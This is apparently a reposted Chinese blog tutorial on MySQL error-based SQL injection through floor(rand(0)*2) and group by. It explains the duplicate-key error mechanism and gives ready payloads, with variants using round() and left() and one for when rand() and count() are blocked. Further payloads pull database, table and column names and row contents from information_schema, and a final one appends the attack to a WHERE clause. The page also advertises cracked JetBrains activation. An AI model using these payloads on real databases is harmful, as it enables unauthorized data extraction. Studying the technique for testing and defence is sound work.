1. 全栈程序员必看首页

group by 报错_group by null

全栈程序员-用户IM 未分类

group by 报错_group by nullfloor()报错注入playloadselect(concat(database(),floor(rand(0)2)))x,concat()frominformation_schema.tablesgroupbyx;函数count(*)函数返回给定选择中被选的函数concat()连接字符串floor()向下取整rand()随机数函数rand(0)伪随机数,生成的随…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

文章目录

mysql bug #8652
有可能不成功,依赖于生成的两次虚拟表的主键不同引发报错

playload

floor():
select concat(floor(rand(0)*2),0x5e,version(),0x5e)x,count(*) from test group by x;
select concat(0x5e,version(),0x5e,floor(rand(0)*2))x,count(*) from (select 1 union select 2 union select 3)a group by x; //数据不足三条或者关键表被禁用

round():
select concat(0x5e,version(),0x5e,round(rand(0)))x,count(*) from test group by x;

left():
select concat(0x5e,version(),0x5e,left(rand(0),3))x,count(*) from test group by x;

rand(),count()被禁用:
select min(@a:=1) from test group by concat(0x5e,@@version,0x5e,@a:=(@a+1)%2);

语句随机应变

函数

group by:分组方式,作为虚拟表的主键
count(*)返回满足条件的行的个数
group by 报错_group by null
concat()连接字符串
group by 报错_group by null
floor()向下取整
round()四舍五入
left(,3)从左向右取三位
rand()随机数函数
rand(0)伪随机数,生成的随机数有规律
group by 报错_group by null
floor(rand(0)*2)
生成的随机数存在规律0110110011101
group by 报错_group by null

原理解析

count函数是统计满足条件的行的个数,它的工作原理是先建一个虚拟表(key是主键,不可被重复)
group by 报错_group by null
先查询数据库中的数据,存在则个数加1,不存在则插入新数据
mysql官方规定,查询时使用rand()函数时,该值会计算多次,即查看虚拟表中是否含有这个数据时,rand函数计算一次,当数据不存在时,会插入数据(rand函数计算的值),插入时rand汉再计算一次
结合floor(rand(0)*2)是有规律的随机数,也就是说:

select floor(rand(0)*2)x,count(*) from test group by x
(select floor(rand(0)*2) as x,count(*) from test group by x)
当查询第一个数据时,x的第一个值是0,在虚拟表中没有这个数据,所以插入数据,count值加1,插入时floor(rand(0)*2)会再被计算一次,值为1,即插入的数据是1,并不是0
group by 报错_group by null
查询第二个数据,此时x的值为1,存在这个数据,count值加1,不需要插入数据,所以floor(rand(0)*2)不会被再次计算
group by 报错_group by null
继续查询数据,此时x值为0,虚拟表中不存在0,所以要插入新数据,此时floor(rand(0)*2)再次被计算,值为1,但是floor(rand(0)*2)是主键,不能被重复,所以此时会报错,报错内容是 1这个主键重复
group by 报错_group by null
虚拟表总共查询的次数为三次,所以floor报错注入满足的条件是数据库中要查询的数据至少3条以上。
我们利用报错信息会把重复的主键打印出来,构造playload,利用concat将我们需要的信息与floor拼接

select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x;(查库)

group by 报错_group by null

select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=“test” limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x;(查表)

group by 报错_group by null

select count(*),concat((select concat(column_name) from information_schema.columns where table_name=“test” limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x;(查列名)

group by 报错_group by null

select count(*),concat((select concat(id,0x3a,name,0x3a,age) from test limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x;

group by 报错_group by null

注入语句:

select id from test where id=1 and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a);

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/187642.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
全栈程序员-用户IM全栈程序员-用户IM
0 0


相关推荐

  • 在Windows XP 上 架设 FTP服务器

    在Windows XP 上 架设 FTP服务器

    在Windows XP 上 架设 FTP服务器架设一台FTP服务器其实很简单。首先,要保证你的机器能上网,而且有不低于ADSL512Kbps的网络速度。其次,硬件性能要能满足你的需要。最后,需要安装FTP服务器端的软件,这类软件很多,可以使用微软的IIS(InternetInformationServer因特网信息服务系统),也可以使用专业软件。不同的软件提供的功能不同,适应的需求和操作系统也不同。一般来说,系统最低要求如下:CPU

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年7月21日
  • 程序员进大厂有多难_编程学完感觉啥也不会

    程序员进大厂有多难_编程学完感觉啥也不会

    程序员进大厂有多难_编程学完感觉啥也不会冰河整理的这份并发编程核心技能,靠它进大厂,效果杠杠的,冰河强烈建议收藏!!

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年8月22日
  • 微信小程序如何连接mysql数据库_微信小程序数据库设计

    微信小程序如何连接mysql数据库_微信小程序数据库设计

    微信小程序如何连接mysql数据库_微信小程序数据库设计刚开始学习小程序,做毕业设计,不过一直都被一个问题困扰,就是连接数据库实现数据的同步。通过其他几篇文章总结出来的成果,记录分享一下,欢迎批评指正!1.定义好数据库连接文件名connect.php在activity.php文件调用定义好的数据库连接其返回值是一个包含结果集中所有数据的二维数组。小程序的index.js这里可以在wx.request方法里面通过data进行传参,把不…

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年9月17日
  • python执行测试用例_测试用例执行结果有哪些

    python执行测试用例_测试用例执行结果有哪些

    python执行测试用例_测试用例执行结果有哪些前言通常我们认为每个测试用例都是相互独立的,因此需要保证测试结果不依赖于测试顺序,以不同的顺序运行测试用例,可以得到相同的结果。pytest默认运行用例的顺序是按模块和用例命名的ASCII编码

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年7月29日
  • FFmpeg源码分析:av_parser_parse2()解析数据包

    FFmpeg源码分析:av_parser_parse2()解析数据包

    FFmpeg源码分析:av_parser_parse2()解析数据包​在FFmpeg的libavcodec模块提供解析数据包和编解码功能。其中,av_parser_parse2()函数用来解析数据包,在使用av_read_frame()读取音视频帧时,会调用到该函数进行数据包解析。关于读取音视频帧的源码分析请查看:av_read_frame()文章。​

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年9月2日
  • 最长上升子序列nlogn算法

    最长上升子序列nlogn算法

    最长上升子序列nlogn算法最长上升子序列nlogn算法题目描述:给定一个整型数组,求这个数组的最长严格递增子序列的长度。譬如序列12243的最长严格递增子序列为1,2,4或1,2,3.他们的长度为3。输入:输入可能包含多个测试案例。对于每个测试案例,输入的第一行为一个整数n(1输入的第二行包括n个整数,代表这个数组中的数字。整数均在int范围内。

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年6月2日

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号